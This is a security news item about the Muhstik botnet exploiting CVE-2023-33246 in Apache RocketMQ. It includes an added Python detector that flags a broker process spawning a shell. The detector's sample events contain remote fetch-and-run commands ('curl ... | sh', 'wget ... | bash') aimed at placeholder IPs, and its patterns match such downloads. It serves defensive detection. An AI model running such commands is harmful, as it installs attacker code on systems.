Vulnerable Apache RocketMQ instances affected by the critical remote code execution bug tracked as CVE-2023-33246 are being targeted by the Muhstik botnet to expand its distributed denial-of-service (DDoS) and cryptocurrency mining operations, reports The Hacker News.
Initial compromise through the Apache RocketMQ exploit is followed by the execution of a shell script fetched from a remote IP address and the deployment of the botnet, which collects system metadata, moves laterally to other devices, and communicates with command-and-control servers in order to launch DDoS attacks, according to a report from Aqua Security.
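The chain described above (exploit, then the broker host running a shell script pulled from a remote IP, then the bot) leaves a process-lineage trace that a defender can alert on. What follows is an added example, not code from the article or from Aqua Security: a small Python classifier run over constructed process-creation events. It assumes the broker is a Java process whose main class is `org.apache.rocketmq.broker.BrokerStartup`; the hostnames, script names and IP addresses (taken from RFC 5737 documentation ranges) are constructed placeholders, not indicators from the report.

```python
"""Flag a RocketMQ broker process that spawns a shell which downloads and runs a
remote script. Added example; the events below are constructed, not real telemetry."""
import re

# Assumption: the broker's Java main class (RocketMQ's standard broker entry point).
BROKER_RE = re.compile(r"org\.apache\.rocketmq\.broker\.BrokerStartup")
# Child command line is a POSIX shell (optionally with an absolute path).
SHELL_RE = re.compile(r"^(?:/bin/|/usr/bin/)?(?:sh|bash|dash)\b")
# Download tool whose output is piped straight into a shell interpreter.
PIPE_TO_SHELL_RE = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:/bin/)?(?:sh|bash)\b")
# URL whose host is a bare IP literal rather than a name (the "remote IP" in the report).
IP_URL_RE = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/")

BROKER_CMD = ("java -cp /opt/rocketmq/lib/* "
              "org.apache.rocketmq.broker.BrokerStartup -c /opt/rocketmq/conf/broker.conf")

# Constructed sample of (parent command line, child command line) process-creation events.
SAMPLE_EVENTS = [
    {"host": "mq-01", "parent": BROKER_CMD,
     "child": "sh -c curl -s http://192.0.2.10/bot.sh | sh"},
    {"host": "mq-01", "parent": BROKER_CMD,
     "child": "sh -c wget -qO- http://198.51.100.7/ld.sh | bash"},
    {"host": "mq-02", "parent": BROKER_CMD,
     "child": "sh -c df -h"},                       # shell from broker, no download
    {"host": "web-01", "parent": "/bin/bash",
     "child": "sh -c curl -s http://203.0.113.5/install.sh | sh"},   # not a broker parent
    {"host": "web-01", "parent": "/bin/bash",
     "child": "sh -c curl -s https://example.com/install.sh | sh"},  # named host, not broker
]


def classify(event):
    """Return an alert dict with a severity, or None if the event is not interesting.

    high   : broker spawned a shell that pipes a download into a shell or hits an IP URL
    medium : broker spawned any shell (a message broker has no business doing so)
    low    : non-broker shell piping a download from a bare IP into a shell
    """
    child = event["child"]
    if not SHELL_RE.match(child):
        return None
    parent_is_broker = bool(BROKER_RE.search(event["parent"]))
    downloads_and_runs = bool(PIPE_TO_SHELL_RE.search(child))
    ip_literal = bool(IP_URL_RE.search(child))

    if parent_is_broker and (downloads_and_runs or ip_literal):
        severity = "high"
    elif parent_is_broker:
        severity = "medium"
    elif downloads_and_runs and ip_literal:
        severity = "low"
    else:
        return None
    return {"host": event["host"], "severity": severity, "child": child,
            "broker_parent": parent_is_broker, "pipe_to_shell": downloads_and_runs,
            "ip_literal_url": ip_literal}


def run_detection(events):
    """Classify every event and drop the uninteresting ones."""
    return [alert for alert in map(classify, events) if alert is not None]


def count_by_severity(alerts):
    """Summarise alerts as {severity: count}."""
    counts = {}
    for alert in alerts:
        counts[alert["severity"]] = counts.get(alert["severity"], 0) + 1
    return counts


if __name__ == "__main__":
    for alert in run_detection(SAMPLE_EVENTS):
        print(f"[{alert['severity']:6}] {alert['host']}: {alert['child']}")
```

The medium tier exists because an interactive shell under the broker is already anomalous on a hardened host, even without a download; tuning it down is a deliberate choice for sites that run operator tooling from the same process tree. The classifier keys only on the post-exploit behaviour the report describes, not on the exploit itself.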
"…[I]n previous campaigns, cryptomining activity was detected after the execution of the Muhstik malware. These objectives go hand in hand, as the attackers strive to spread and infect more machines, which helps them in their mission to mine more cryptocurrency using the electrical power of the compromised machines," said Aqua Security researcher Nitzan Yaakov, who called for the prompt remediation of the more than 5,000 unpatched Apache RocketMQ instances.